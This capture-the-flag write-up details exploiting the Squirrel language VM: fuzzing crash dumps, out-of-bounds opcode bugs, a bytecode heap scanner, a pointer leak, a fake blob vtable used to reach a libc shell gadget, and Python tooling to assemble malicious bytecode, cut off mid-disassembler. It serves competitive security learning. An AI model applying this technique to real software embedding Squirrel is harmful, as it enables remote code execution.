Squirrel as a Service - localo

Category: Pwn
Difficulty: Hard
Author: 0x4d5a

Description

🐿️ as a Service! Squirrel lang (ˈaɪ̯çˌhœʁnçən) is a super simple programming language. And our server will execute your squirrel scripts, either in text or binary based format. Go exploit it. To test this service, take this cool script:

class CSCG
{
constructor()
{
isCool = true;
}
isCool = false;
}

function CSCG::IsCool()
{
if (isCool)
{
print("CSCG is so cool!\n");
}
}
local cscg = CSCG()
cscg.IsCool()

Server: nc hax1.allesctf.net 9888

Summery

Squirrel is a scripting language similar to lua, it aims to be used in video games and as such can be integrated and interfaced with easily. The language implements most techniques that are expected in a modern language. And is in my opinion easier to read than lua. Even though it is not that well known, it is used in quite some Projects like Code::Blocks and the Source engine by Valve, and therefore vulnerabilities in it would affect millions.
The author provided an archive containing instruction to get the server side setup.

Solution

Fuzz all the Things

I started to write a docker based fuzzing setup and let that run over the night, the next day I had roughly 9k crashes. I used crashwalk to reduce it, but it were too many for me to analyze.

[...]
---CRASH SUMMARY---
Filename: /fuzz_io/out/fuzzer1/crashes/id:000035,sig:11,src:000000,time:1272838,op:flip1,pos:1311
SHA1: 67f9873e108039bec32cbcd109119533ec15a828
Classification: UNKNOWN
Hash: 7e9e6aa05b01cb24de3471559b9e8fc4.72f09c75dfdfafd9e2f45a7422cbc2b6
Command: /app/bin/sq /fuzz_io/out/fuzzer1/crashes/id:000035,sig:11,src:000000,time:1272838,op:flip1,pos:1311
Faulting Frame:
   SQObjectPtr::operator= @ 0x00007f3c3234f4c5: in /app/lib/libsquirrel.so.0.0.0
Disassembly:
   0x00007f3c3234f4b1: mov rax,QWORD PTR [rsp+0x18]
   0x00007f3c3234f4b6: add rbp,QWORD PTR [rax]
   0x00007f3c3234f4b9: mov rax,QWORD PTR [rsp+0x10]
   0x00007f3c3234f4be: mov r13,QWORD PTR [rax]
   0x00007f3c3234f4c1: shl rbp,0x4
=> 0x00007f3c3234f4c5: test BYTE PTR [r13+rbp*1+0x3],0x8
   0x00007f3c3234f4cb: je 0x7f3c3234f54c <SQVM::Execute(SQObjectPtr&, long long, long long, SQObjectPtr&, unsigned long long, SQVM::ExecutionType)+9212>
   0x00007f3c3234f4cd: data16 lea rdi,[rip+0x2ba2b] # 0x7f3c3237af00
   0x00007f3c3234f4d5: data16 data16 call 0x7f3c322a7310 <__tls_get_addr@plt>
   0x00007f3c3234f4dd: movsxd rcx,DWORD PTR [rax]
Stack Head (6 entries):
   SQObjectPtr::operator=    @ 0x00007f3c3234f4c5: in /app/lib/libsquirrel.so.0.0.0
   SQVM::Execute             @ 0x00007f3c3234f4c5: in /app/lib/libsquirrel.so.0.0.0
   SQVM::Call                @ 0x00007f3c3234c4f6: in /app/lib/libsquirrel.so.0.0.0
   sq_call                   @ 0x00007f3c322b7100: in /app/lib/libsquirrel.so.0.0.0
   executeVm                 @ 0x0000000000402710: in /app/bin/sq
   main                      @ 0x0000000000402935: in /app/bin/sq
Registers:
rax=0x0000000001622850 rbx=0x00000000000000b4 rcx=0x000000000000221b rdx=0x0000000000406200 
rsi=0x0000000000406200 rdi=0x00007f3c3237af00 rbp=0x000000000003c2e0 rsp=0x00007ffe269cea50 
 r8=0x0000000000003beb  r9=0x0000000000000000 r10=0x0000000000000001 r11=0x0000000000000246 
r12=0x0000000000406188 r13=0x0000000001630d60 r14=0x0000000000000000 r15=0x00007f3c31cfb848 
rip=0x00007f3c3234f4c5 efl=0x0000000000010202  cs=0x0000000000000033  ss=0x000000000000002b 
 ds=0x0000000000000000  es=0x0000000000000000  fs=0x0000000000000000  gs=0x0000000000000000 
Extra Data:
   Description: Access violation
   Short description: AccessViolation (21/22)
   Explanation: The target crashed due to an access violation but there is not enough additional information available to determine exploitability.
---END SUMMARY---
(1 of 1) - Hash: 9da86ce1cc85e2b15e2b621b2a84dd65.163b841cd23f78f643155e229efb9688
---CRASH SUMMARY---
Filename: /fuzz_io/out/fuzzer1/crashes/id:000007,sig:11,src:000000,time:4951,op:flip1,pos:131
SHA1: c5a3e149c7c5a699938076ff78c95205f6b18b6d
Classification: EXPLOITABLE
Hash: 9da86ce1cc85e2b15e2b621b2a84dd65.163b841cd23f78f643155e229efb9688
Command: /app/bin/sq /fuzz_io/out/fuzzer1/crashes/id:000007,sig:11,src:000000,time:4951,op:flip1,pos:131
Faulting Frame:
   SQClosure::Create @ 0x00007fa85565b295: in /app/lib/libsquirrel.so.0.0.0
Disassembly:
   0x00007fa85565b282: add dl,0x1
   0x00007fa85565b285: adc dl,0x0
   0x00007fa85565b288: mov BYTE PTR [rsi+rcx*1],dl
   0x00007fa85565b28b: mov DWORD PTR [rax],0x23c9
   0x00007fa85565b291: mov rax,QWORD PTR [r13+0x58]
=> 0x00007fa85565b295: mov DWORD PTR [rax+rbx*1-0x8],0x1000001
   0x00007fa85565b29d: mov QWORD PTR [rax+rbx*1],0x0
   0x00007fa85565b2a5: inc r15
   0x00007fa85565b2a8: add rbx,0x10
   0x00007fa85565b2ac: cmp r15,QWORD PTR [r14+0xc8]
Stack Head (6 entries):
   SQClosure::Create         @ 0x00007fa85565b295: in /app/lib/libsquirrel.so.0.0.0
   SQClosure::Load           @ 0x00007fa8556b947a: in /app/lib/libsquirrel.so.0.0.0
   sq_readclosure            @ 0x00007fa855655b1f: in /app/lib/libsquirrel.so.0.0.0
   sqstd_loadfile            @ 0x00007fa855732866: in /app/lib/libsqstdlib.so.0.0.0
   executeVm                 @ 0x000000000040267a: in /app/bin/sq
   main                      @ 0x0000000000402935: in /app/bin/sq
Registers:
rax=0x0000000001ed9d40 rbx=0x000000000001a2c8 rcx=0x000000000000645a rdx=0x0000000000000046 
rsi=0x0000000000406200 rdi=0x00007fa855717f00 rbp=0x0000000001ed29e0 rsp=0x00007ffcd1165420 
 r8=0x0000000001ed9ce0  r9=0x0000000001ed9a60 r10=0x00007fa855639f59 r11=0x00007fa855626be0 
r12=0x0000000000406188 r13=0x0000000001ed9ce0 r14=0x0000000001ed92f0 r15=0x0000000000001a2c 
rip=0x00007fa85565b295 efl=0x0000000000010202  cs=0x0000000000000033  ss=0x000000000000002b 
 ds=0x0000000000000000  es=0x0000000000000000  fs=0x0000000000000000  gs=0x0000000000000000 
Extra Data:
   Description: Access violation on destination operand
   Short description: DestAv (8/22)
   Explanation: The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control the write address and/or value.
---END SUMMARY---
(1 of 1) - Hash: ec69f912f58555510ae8ffd8bf4d4ea9.ec69f912f58555510ae8ffd8bf4d4ea9
---CRASH SUMMARY---
Filename: /fuzz_io/out/fuzzer1/crashes/id:000031,sig:11,src:000000,time:898403,op:flip1,pos:871
SHA1: 096287872aab8e4c4315c59ed7a1218faa57b72c
Classification: UNKNOWN
Hash: ec69f912f58555510ae8ffd8bf4d4ea9.ec69f912f58555510ae8ffd8bf4d4ea9
Command: /app/bin/sq /fuzz_io/out/fuzzer1/crashes/id:000031,sig:11,src:000000,time:898403,op:flip1,pos:871
Faulting Frame:
   SQVM::Execute @ 0x00007f724bca3300: in /app/lib/libsquirrel.so.0.0.0
Disassembly:
   0x00007f724bca32ec: mov QWORD PTR [rsp+0x8],rax
   0x00007f724bca32f1: movsxd r15,DWORD PTR [rax]
   0x00007f724bca32f4: add r15,r14
   0x00007f724bca32f7: shl r15,0x4
   0x00007f724bca32fb: mov QWORD PTR [rsp+0x30],rcx
=> 0x00007f724bca3300: mov ecx,DWORD PTR [rcx+r15*1]
   0x00007f724bca3304: mov eax,ecx
   0x00007f724bca3306: or eax,r13d
   0x00007f724bca3309: cdqe
   0x00007f724bca330b: cmp rax,0x5000006
Stack Head (5 entries):
   SQVM::Execute             @ 0x00007f724bca3300: in /app/lib/libsquirrel.so.0.0.0
   SQVM::Call                @ 0x00007f724bc9e4f6: in /app/lib/libsquirrel.so.0.0.0
   sq_call                   @ 0x00007f724bc09100: in /app/lib/libsquirrel.so.0.0.0
   executeVm                 @ 0x0000000000402710: in /app/bin/sq
   main                      @ 0x0000000000402935: in /app/bin/sq
Registers:
rax=0x0000000001dba4e0 rbx=0x0000000000000035 rcx=0x0000000001dad980 rdx=0x0000000000406200 
rsi=0x0000000000406200 rdi=0x00007f724bcccf00 rbp=0x0000000000000070 rsp=0x00007ffee91de630 
 r8=0x0000000000000009  r9=0x0000000000000001 r10=0x00007f724bbf1fe1 r11=0x00007f724bc97c20 
r12=0x0000000000406188 r13=0x0000000008000010 r14=0x0000000000000002 r15=0x0000000000080080 
rip=0x00007f724bca3300 efl=0x0000000000010202  cs=0x0000000000000033  ss=0x000000000000002b 
 ds=0x0000000000000000  es=0x0000000000000000  fs=0x0000000000000000  gs=0x0000000000000000 
Extra Data:
   Description: Access violation on source operand
   Short description: SourceAv (19/22)
   Explanation: The target crashed on an access violation at an address matching the source operand of the current instruction. This likely indicates a read access violation.
---END SUMMARY---
(1 of 1) - Hash: 8b6f67aba69bfd716aa02e94a3297c23.08f6280a7bcba65193f9eb4d56f938d3
---CRASH SUMMARY---
Filename: /fuzz_io/out/fuzzer1/crashes/id:000032,sig:11,src:000000,time:926722,op:flip1,pos:1010
SHA1: a16b39df97c4a8d2d0fba70b265d34612359c66a
Classification: UNKNOWN
Hash: 8b6f67aba69bfd716aa02e94a3297c23.08f6280a7bcba65193f9eb4d56f938d3
Command: /app/bin/sq /fuzz_io/out/fuzzer1/crashes/id:000032,sig:11,src:000000,time:926722,op:flip1,pos:1010
Faulting Frame:
   SQVM::NewSlot @ 0x00007f25e839dbfb: in /app/lib/libsquirrel.so.0.0.0
Disassembly:
   0x00007f25e839dbe9: mov bl,BYTE PTR [rdx+rcx*1]
   0x00007f25e839dbec: add bl,0x1
   0x00007f25e839dbef: adc bl,0x0
   0x00007f25e839dbf2: mov BYTE PTR [rdx+rcx*1],bl
   0x00007f25e839dbf5: mov DWORD PTR [rax],0x181a
=> 0x00007f25e839dbfb: mov eax,DWORD PTR [r12]
   0x00007f25e839dbff: cmp eax,0x8004000
   0x00007f25e839dc04: je 0x7f25e839f08d <SQVM::NewSlot(SQObjectPtr const&, SQObjectPtr const&, SQObjectPtr const&, bool)+5437>
   0x00007f25e839dc0a: cmp eax,0xa008000
   0x00007f25e839dc0f: je 0x7f25e839e788 <SQVM::NewSlot(SQObjectPtr const&, SQObjectPtr const&, SQObjectPtr const&, bool)+3128>
Stack Head (6 entries):
   SQVM::NewSlot             @ 0x00007f25e839dbfb: in /app/lib/libsquirrel.so.0.0.0
   SQVM::Execute             @ 0x00007f25e8392977: in /app/lib/libsquirrel.so.0.0.0
   SQVM::Call                @ 0x00007f25e838f4f6: in /app/lib/libsquirrel.so.0.0.0
   sq_call                   @ 0x00007f25e82fa100: in /app/lib/libsquirrel.so.0.0.0
   executeVm                 @ 0x0000000000402710: in /app/bin/sq
   main                      @ 0x0000000000402935: in /app/bin/sq
Registers:
rax=0x00007f25e7d86800 rbx=0x0000000000000001 rcx=0x0000000000007ca8 rdx=0x0000000000406200 
rsi=0x00000000113c89b0 rdi=0x00007f25e83bdf00 rbp=0x0000000000000000 rsp=0x00007ffd55ff4990 
 r8=0x0000000000000000  r9=0x00000000013d5220 r10=0x00000000013ae010 r11=0x00007f25e82ccbe0 
r12=0x00000000113c89b0 r13=0x00000000013c8820 r14=0x0000000000406188 r15=0x00000000013c89c0 
rip=0x00007f25e839dbfb efl=0x0000000000010202  cs=0x0000000000000033  ss=0x000000000000002b 
 ds=0x0000000000000000  es=0x0000000000000000  fs=0x0000000000000000  gs=0x0000000000000000 
Extra Data:
   Description: Access violation on source operand
   Short description: SourceAv (19/22)
   Explanation: The target crashed on an access violation at an address matching the source operand of the current instruction. This likely indicates a read access violation.
---END SUMMARY---
[...]

Target analysis

I decided to do some source code review, since I now knew that the target is full of bugs. Since the server binary has all common exploit mitigations enabled, the bugs that are most interesting are Out-Of-Bounds read/write, Use-After-Free, Type Confusion and Logic bugs. For the input either use source code that squirrel compiles or pre compiled code that is directly interpreted can be used. I took a quick look at the lexer (since that would allow source code based exploitation), but found nothing of interest and continued to search for bugs in the VM itself. The VM implements 61 opcodes and is written in hard to read C++ code. The instructions like other structures are directly copied from the binary into memory, before being parsed. Each instruction is structured like this:

typedef struct{
    int_32 _arg1;
    unsigned char op;
    unsigned char _arg0;
    unsigned char _arg2;
    unsigned char _arg3;
} SQInstruction;

The VM uses a stack and lives in the heap. Each stack object is a SQObjectPtr, basically a structure on that contains a type id and a pointer to an object.

typedef struct tagSQObject
{
    SQObjectType _type;     //4 bytes, padded to 8
    SQObjectValue _unVal;   //8 bytes
}SQObject;

There are 18 (+1 WIERD_TYPE) basic types, most of the just hold pointer, but 4 hold their value directly: OT_NULL, OT_INTEGER, OT_FLOAT, OT_BOOL. The types are implemented using an enum and hold additional information such as if their reference has to be counted.

typedef enum tagSQObjectType {
	OT_NULL = (_RT_NULL | SQOBJECT_CANBEFALSE),
	OT_INTEGER = (_RT_INTEGER | SQOBJECT_NUMERIC | SQOBJECT_CANBEFALSE),
	OT_FLOAT = (_RT_FLOAT | SQOBJECT_NUMERIC | SQOBJECT_CANBEFALSE),
	OT_BOOL = (_RT_BOOL | SQOBJECT_CANBEFALSE),
	OT_STRING = (_RT_STRING | SQOBJECT_REF_COUNTED),
	OT_TABLE = (_RT_TABLE | SQOBJECT_REF_COUNTED | SQOBJECT_DELEGABLE),
	OT_ARRAY = (_RT_ARRAY | SQOBJECT_REF_COUNTED),
	OT_USERDATA = (_RT_USERDATA | SQOBJECT_REF_COUNTED | SQOBJECT_DELEGABLE),
	OT_CLOSURE = (_RT_CLOSURE | SQOBJECT_REF_COUNTED),
	OT_NATIVECLOSURE = (_RT_NATIVECLOSURE | SQOBJECT_REF_COUNTED),
	OT_GENERATOR = (_RT_GENERATOR | SQOBJECT_REF_COUNTED),
	OT_USERPOINTER = _RT_USERPOINTER,
	OT_THREAD = (_RT_THREAD | SQOBJECT_REF_COUNTED),
	OT_FUNCPROTO = (_RT_FUNCPROTO | SQOBJECT_REF_COUNTED), //internal usage only
	OT_CLASS = (_RT_CLASS | SQOBJECT_REF_COUNTED),
	OT_INSTANCE = (_RT_INSTANCE | SQOBJECT_REF_COUNTED | SQOBJECT_DELEGABLE),
	OT_WEAKREF = (_RT_WEAKREF | SQOBJECT_REF_COUNTED),
	OT_OUTER = (_RT_OUTER | SQOBJECT_REF_COUNTED), //internal usage only
	WIERD_TYPE = 0x00
}SQObjectType;

Everything else is implemented as a class.

Bug hunting

I found many bugs in the VM code, some that are exploitable, and some that aren't, well at least not that easy (try to exploit the type confusion in _OP_APPENDARRAY, I tried to do it using a string, but you need some leaks and there are many easier bugs to exploit).

For my exploit I used mainly OOB bugs since there are no argument bounds check for any opcode. Opcodes that are useful are _OP_LOAD, it loads a object pointer from the literals section onto the stack and _OP_MOVE that copies a pointer from one location on the stack to another one. The literals section is quite interesting, because it is used in a big chunk of memory that contains multiple sections an therefore a OOB onto the other sections would not be affected by the heap layout.

    static SQFunctionProto *Create(SQSharedState *ss,SQInteger ninstructions,
        SQInteger nliterals,SQInteger nparameters,
        SQInteger nfunctions,SQInteger noutervalues,
        SQInteger nlineinfos,SQInteger nlocalvarinfos,SQInteger ndefaultparams)
    {
        SQFunctionProto *f;
        //I compact the whole class and members in a single memory allocation
        f = (SQFunctionProto *)sq_vm_malloc(_FUNC_SIZE(ninstructions,nliterals,nparameters,nfunctions,noutervalues,nlineinfos,nlocalvarinfos,ndefaultparams));
        new (f) SQFunctionProto(ss);
        f->_ninstructions = ninstructions;
        f->_literals = (SQObjectPtr*)&f->_instructions[ninstructions];
        f->_nliterals = nliterals;
        f->_parameters = (SQObjectPtr*)&f->_literals[nliterals];
        f->_nparameters = nparameters;
        f->_functions = (SQObjectPtr*)&f->_parameters[nparameters];
        f->_nfunctions = nfunctions;
        f->_outervalues = (SQOuterVar*)&f->_functions[nfunctions];
        f->_noutervalues = noutervalues;
        f->_lineinfos = (SQLineInfo *)&f->_outervalues[noutervalues];
        f->_nlineinfos = nlineinfos;
        f->_localvarinfos = (SQLocalVarInfo *)&f->_lineinfos[nlineinfos];
        f->_nlocalvarinfos = nlocalvarinfos;
        f->_defaultparams = (SQInteger *)&f->_localvarinfos[nlocalvarinfos];
        f->_ndefaultparams = ndefaultparams;
[...]

Using this "fake" object pointers can be loaded onto the stack, if they are created in one of the sections in the same chunk. I decided to append 16 bytes to the instructions and then use a _OP_LOAD oob read to load for example a fake native closure, a object pointing to a native function, onto the stack. I wrote a basic disassembler and an assembler for squirrel and did some testing, it worked, but what ever I tried there was no way around a leak. But even if I would get a leak, I can't change my instructions in runtime. This problem was quite hard for me to overcome. I searched for other bugs and developed some strategies that would utilise heap sprays or static offsets on the heap, I should have gone with heap spraying, but for some reason I can't remember I didn't.

I did some Windows pwning and got used to the tooling, therefore I decided to exploit it on Windows first and then back-port it to Linux. This was a bad idea, since I later realized, that the heap offsets on Linux were static, but the Windows heap offsets were random and therefore I decided to go back to my first idea.

Something something self-modifying code -> shell

I can't change my instructions in runtime. or can I?! If I would know the offset from the stack to the instruction section I could use a JMP instruction to jump to the stack and execute my squirrel code there. And since every Instruction is just 8 bytes I could just use the _OT_INTEGER objects, since I can do simple integer arithmetic with their value, which is exactly 8 bytes. And _OT_INTEGER type interpreted as a instruction is:

0x0500000200000000: _OP_LINE arg0: 0x00 arg1: 0x05000002 arg2: 0x00 arg3: 0x00

By taking a look at the _OP_LINE implementation, it can be seen that it is like a NOP instruction if no _debughook is set, which is the case.

case _OP_LINE: 
	if (_debughook) CallDebugHook(_SC('l'),arg1); continue;

The instruction pointer will just continue to the value of the _OT_INTEGER. If I now get a leak I can change for example arg1 for _OP_MOVE to read at any address I want. For the leak I use the tostring closure, it reads a SQObjectPtr from the stack and depending on the type return different strings.

bool SQVM::ToString(const SQObjectPtr &o,SQObjectPtr &res)
{
    switch(sq_type(o)) {
    case OT_STRING:
        res = o;
        return true;
    case OT_FLOAT:
        scsprintf(_sp(sq_rsl(NUMBER_MAX_CHAR+1)),sq_rsl(NUMBER_MAX_CHAR),_SC("%g"),_float(o));
        break;
    case OT_INTEGER:
        scsprintf(_sp(sq_rsl(NUMBER_MAX_CHAR+1)),sq_rsl(NUMBER_MAX_CHAR),_PRINT_INT_FMT,_integer(o));
        break;
    case OT_BOOL:
        scsprintf(_sp(sq_rsl(6)),sq_rsl(6),_integer(o)?_SC("true"):_SC("false"));
        break;
    case OT_NULL:
        scsprintf(_sp(sq_rsl(5)),sq_rsl(5),_SC("null"));
        break;
    case OT_TABLE:
    case OT_USERDATA:
    case OT_INSTANCE:
        if(_delegable(o)->_delegate) {
            SQObjectPtr closure;
            if(_delegable(o)->GetMetaMethod(this, MT_TOSTRING, closure)) {
                Push(o);
                if(CallMetaMethod(closure,MT_TOSTRING,1,res)) {
                    if(sq_type(res) == OT_STRING)
                        return true;
                }
                else {
                    return false;
                }
            }
        }
    default:
        int a = sizeof(SQString);
        SQObjectPtr*  b = _array(o)->_values._vals;
        scsprintf(_sp(sq_rsl((sizeof(void*)*2)+NUMBER_MAX_CHAR)),sq_rsl((sizeof(void*)*2)+NUMBER_MAX_CHAR),_SC("(%s : 0x%p)"),GetTypeName(o),(void*)_rawval(o));
    }
    res = SQString::Create(_ss(this),_spval);
    return true;
}

The default case is quite interesting, since it will print just the raw pointer value. There is the leak. One problem remains, how do I get the instruction pointer onto the squirrel stack?! A heap scanner could be used to scan for a value on the stack to get the offset. My first idea was using _OP_MOVE with a negative arg1 to scan the heap. A basic heap scanner would look like this:

local cmp = 0x411337421337
local cmp2 = 0
for(local i = 10; i< scan_width; i+=1){
	asm{
		_OP_MOVE: arg0: stack_addr(cmp2) arg1: -i arg2:0 arg3: 0
	}
	if(cmp == cmp2){
		asm{
			_OP_JMP: arg0: 0 arg1: i-ip_offset-stack_base-literal_offset arg2: 0 arg3: 0
		}
	}
}

The code above would, in theory, scan the heap from the stack to the literals section of the function, since integers with more than 4 bytes are stored as a literal. After that it would jump that offset, but the offset needs to be adjusted depending on the stack_base, literal location and instruction pointer location. The loop has to be enrolled, since it is still not possible to modify the instruction in runtime. I wrote some assembly code based on that, optimized for size. After many hours of fine tuning I came up with those instructions:

stack:
	base + 0x00: 0x411337421337

NE          a0: 1 a1:-10 a2:0x00 a3:0x00
JZ          a0: 1 a1:-10 a2:0x00 a3:0x00
NE          a0: 1 a1:-11 a2:0x00 a3:0x00
JZ          a0: 1 a1:-11 a2:0x00 a3:0x00
NE          a0: 1 a1:-12 a2:0x00 a3:0x00
JZ          a0: 1 a1:-12 a2:0x00 a3:0x00
NE          a0: 1 a1:-13 a2:0x00 a3:0x00
JZ          a0: 1 a1:-13 a2:0x00 a3:0x00
[...]

The idea is to use _OP_NE instead of _OP_MOVE and _OP_CMP since it is less code and more important: _OP_MOVE copies the SQObjectPtr on the stack first, by doing so, squirrel will increase the reference count if the SQOBJECT_REF_COUNTED bit is set, this will result in many invalid dereferences and crash the program. _OP_NE uses SQVM::IsEqual and checks if th types match and if their raw value matches, if not it will do some special checks for integers and floats, but it will never dereference anything and is therefore perfect.

case _OP_NE:{
    bool res;
    if(!IsEqual(STK(arg2),COND_LITERAL,res)) { SQ_THROW(); }
    TARGET = (!res)?true:false;
    } continue;

_OP_JZ just checks if the target (STK(arg0)) is false and increments the instruction pointer by arg1 if thats the case.

case _OP_JZ:
	if(IsFalse(STK(arg0))) ci->_ip+=(sarg1); continue;

And by combining those two instructions, the instruction count is reduced to 2 instructions per loop cycle.

And it can be done even better:
By not trying to find the exact offset by using a search step size of 64 and creating that amount of literals, it is possible to scan n = 0x1000 in 128 instructions instead of 8192‬, but it would produce more literals resulting in 2nx8+x16=2048\frac{2n}{x} \cdot 8 + x \cdot 16= 2048 ‬ bytes compared to 2n8+116=655522n \cdot 8 + 1 \cdot 16 = 65552 bytes
Here the calculation for the step size:
f(x)=nx+xf(x)=1nx2f(x)=!0x=±nf(x) = \frac{n}{x} + x \\ f'(x) = 1-\frac{n}{x^2} \\ f'(x) \overset{!}{=} 0 \\ \llap{$\rightarrow$\hspace{50pt}} x = \pm\sqrt{n}

I use a step size of 40 in my code, because I fucked up somewhere in the offset calculation and 40 seems to work for the Docker image.

By loading the code somewhere later into the stack and before that a big nop slide, code on the stack can be executed. So basically the classic jmp esp, but in squirrel. But how to get back? I ended up using traps, since they save the stack base and the instruction pointer location. On the stack all that is needed is to throw an exception to get back into a "normal" state.

How to shell

On linux the system function is compiled into the binary even though it is not registered.I can't just use system("sh") in squirrel, but if I create a native closure with the _function pointer pointing to _system_system I can call that native closure to get a shell. I would need to leak a pointer pointing somewhere inside the sqstdlib library and could then calculate the address of _system_system based on the docker setup. But I decided to try to exploit it without the _system_system since that would require "remote information" which I avoided to this point.
I decided that a libc leak would be okay, since libc-db can be used to get the version and use it to calculate the offset. I could also have used a pattern scan and then no offset would be needed, but I left implementing that as an exercise for the reader.

I ended up using a vtable of a fake blob instead of _function since I can control the arguments in self->Write used in _stream_writen

SQInteger _stream_writen(HSQUIRRELVM v)
{
    SETUP_STREAM(v);
    SQInteger format, ti;
    SQFloat tf;
    sq_getinteger(v, 3, &format);
    switch(format) {
    case 'l': {
        SQInteger i;
        sq_getinteger(v, 2, &ti);
        i = ti;
        self->Write(&i, sizeof(SQInteger));
              }
        break;
        [...]

That is perfect for a one_gadget just a libc pointer leak is needed. By allocating a big chunk on the heap, a libc pointer is placed directly after the chunk and therefore can be leaked.
To create the fake blob I used a blob, because it is easy to write data to it and the object address can be leaked using tostring. Using that address and the offset to the blob data, I can write a fake instance pointing to the fake blob and move it on the squirrel stack, to execute writen and spawn a shell.

Code

assembler:

import struct

from sqdef import *
from common import *

def parse_assembly(assembly):
    instructions = []
    for x in assembly.split("\n"):
        data = x.strip()
        if data and  data[0]!="#":
            data = data.split("a0:")
            op = data[0].strip()
            if op in name2op:
                op = name2op[op]
            else:
                print("UNKNOWN instruction: %s" %(op))
                return
            data = data[1].split("a1:")
            a0 = int(data[0].strip(),16)
            data = data[1].split("a2:")
            a1 = int(data[0].strip(),16)
            data = data[1].split("a3:")
            a2 = int(data[0].strip(),16)
            a3 = int(data[1].strip(),16)
            instructions.append(SQInstruction(op,a0,a1,a2,a3))
    return instructions

class SQFile:

    def __init__(self):
        self.data = bytearray()
        self.pos = 0

    def assemble(self,main,rawdata=bytearray(0)):
        self.write(b'\xFA\xFA')
        self.write(b'RIQS')
        self.write(struct.pack("I",1))
        self.write(struct.pack("I",8))
        self.write(struct.pack("I",4))
        self.write_function(main,data=rawdata)
        self.write(b'LIAT')


    def write_object(self,t,o):
        self.write(struct.pack("I",t))
        if t == tmap['OT_STRING']:
            self.write(struct.pack("Q",len(o)))
            if type(o) == str:
                self.write(o.encode())
            else:
                self.write(o)
        elif t == tmap['OT_INTEGER']:
            self.write(struct.pack("Q",o))
        elif t == tmap['OT_BOOL']:
            self.write(struct.pack("Q",1 if o else 0))
        elif t == tmap['OT_FLOAT']:
            self.write(struct.pack("f",self.read(4)))

    def write_function(self,fun,data=bytearray(0)):
        self.write(b'TRAP')
        self.write_object(tmap['OT_STRING'],fun.sourcename)
        self.write_object(tmap['OT_STRING'],fun.function_name)
        self.write(b'TRAP')

        self.write(struct.pack("Q",len(fun.literals)))
        self.write(struct.pack("Q",len(fun.parameters)))
        self.write(struct.pack("Q",len(fun.outervalues)))
        self.write(struct.pack("Q",len(fun.localvarinfos)))
        self.write(struct.pack("Q",len(fun.lineinfos) //16 ))
        self.write(struct.pack("Q",len(fun.defaultparams)//8))
        self.write(struct.pack("Q",len(fun.instructions)+((len(data) // 8) + (1 if len(data) % 8 != 0 else 0))))
        self.write(struct.pack("Q",len(fun.functions)))
        self.write(b'TRAP')


        for x in fun.literals:
            self.write_object(x[0],x[1])

        self.write(b'TRAP')

        
        for x in fun.parameters:
            self.write_object(x[0],x[1])

        self.write(b'TRAP')


        for x in fun.outervalues:
            self.write(struct.pack("Q",x[0]))
            self.write_object(x[1],x[2])
            self.write_object(tmap['OT_STRING'],x[3])
        
        self.write(b'TRAP')

        for x in fun.localvarinfos:
            self.write_object(x[0][0],x[0][1])
            self.write(struct.pack("QQQ",x[1],x[2],x[3]))
        
        self.write(b'TRAP')

        self.write(fun.lineinfos)

        self.write(b'TRAP')

        self.write(fun.defaultparams)

        self.write(b'TRAP')

        for ins in fun.instructions:
            self.write(struct.pack("iBBBB",ins.arg1,ins.op,ins.arg0,ins.arg2,ins.arg3))
        
        for x in range(len(data)+(len(data)%8)):
            if x < len(data):
                self.write(struct.pack('B',data[x]))
            else:
                self.write(b'\x00')

        self.write(b'TRAP')

        for x in fun.functions:
            self.write_function(x)
        
        self.write(struct.pack("q",fun.stack_size))
        self.write(struct.pack("B",1 if fun.is_generator else 0))
        self.write(struct.pack("Q",fun.var_params))

    def write1(self,val):
        self.pos+=1
        self.data+=val


    def write(self,data):
        self.pos+=len(data)
        self.data+= data 
    
if __name__ == "__main__":
    assembly="""
    LOADNULLS a0: 0x00 a1: 0x01 a2: 0x00 a3: 0x00
    LOADINT   a0: 0x01 a1: 0x41 a2: 0x00 a3: 0x00
    SETOUTER  a0: 0x01 a1: %x   a2: 0x01 a3: 0x00
    """%(-1)
    s = SQFile()
    t = tmap['OT_NATIVECLOSURE']
    main = SQFunction("h4x","name",var_params=1,stack_size=4,instructions=parse_assembly(assembly),literals=[])

    s.assemble(main)
    with open("test.cnut","wb") as f:
        f.write(s.data)

disassembler:

import struct

from sqdef import *
from common import *

class SQFile:

    def __init__(self, data):
        self.data = data
        self.pos = 0
        self.main = None

    def parse(self):
        magic = self.read(2)
        assert(magic == b'\xFA\xFA')
        head = self.read(4)
        assert(head == b'RIQS')
        [sz_sqchar] = struct.unpack("I", self.read(4))
        assert(sz_sqchar == 1)
        [sz_sqint] = struct.unpack("I", self.read(4))
        assert(sz_sqint == 8)
        [sz_sqfloat] = struct.unpack("I", self.read(4))
        assert(sz_sqfloat == 4)
        self.main = self.parse_function()
        tail = self.read(4)
        assert(tail == b'LIAT')

    def parse_object(self):
        [t] = struct.unpack("I", self.read(4))
        if t == tmap['OT_STRING']:
            [v] = struct.unpack("Q", self.read(8))
            return (t,self.read(v).decode())
        elif t == tmap['OT_INTEGER']:
            [v] = struct.unpack("Q", self.read(8))
            return (t,v)
        elif t == tmap['OT_BOOL']:
            [v] = struct.unpack("Q", self.read(8))
            return (t,v != 0)
        elif t == tmap['OT_FLOAT']:
            [v] = struct.unpack("f", self.read(4))
            return (t,v)
        elif t == tmap['OT_NULL']:
            return (t,None)

    def parse_function(self):
        part = self.read(4)
        assert(part == b'TRAP')
        sourcename = self.parse_object()[1]
        function_name = self.parse_object()[1]
        part = self.read(4)
        assert(part == b'TRAP')

        [n_literals] = struct.unpack("Q", self.read(8))
        [n_parameters] = struct.unpack("Q", self.read(8))
        [n_outervalues] = struct.unpack("Q", self.read(8))
        [n_localvarinfos] = struct.unpack("Q", self.read(8))
        [n_lineinfos] = struct.unpack("Q", self.read(8))
        [n_defaultparams] = struct.unpack("Q", self.read(8))
        [n_instructions] = struct.unpack("Q", self.read(8))
        [n_functions] = struct.unpack("Q", self.read(8))

        part = self.read(4)
        assert(part == b'TRAP')

        literals = []
        for _ in range(n_literals):
            literals.append(self.parse_object())

        part = self.read(4)
        assert(part == b'TRAP')

        parameters = []
        for _ in range(n_parameters):
            parameters.append(self.parse_object())

        part = self.read(4)
        assert(part == b'TRAP')

        outervalues = []
        for _ in range(n_outervalues):
            [t] = struct.unpack("Q", self.read(8))
            o = self.parse_object()
            name = self.parse_object()
            outervalues.append((name, o, t))

        part = self.read(4)
        assert(part == b'TRAP')

        localvarinfos = []
        for _ in range(n_localvarinfos):
            name = self.parse_object()
            [pos, start, end] = struct.unpack("QQQ", self.read(8*3))
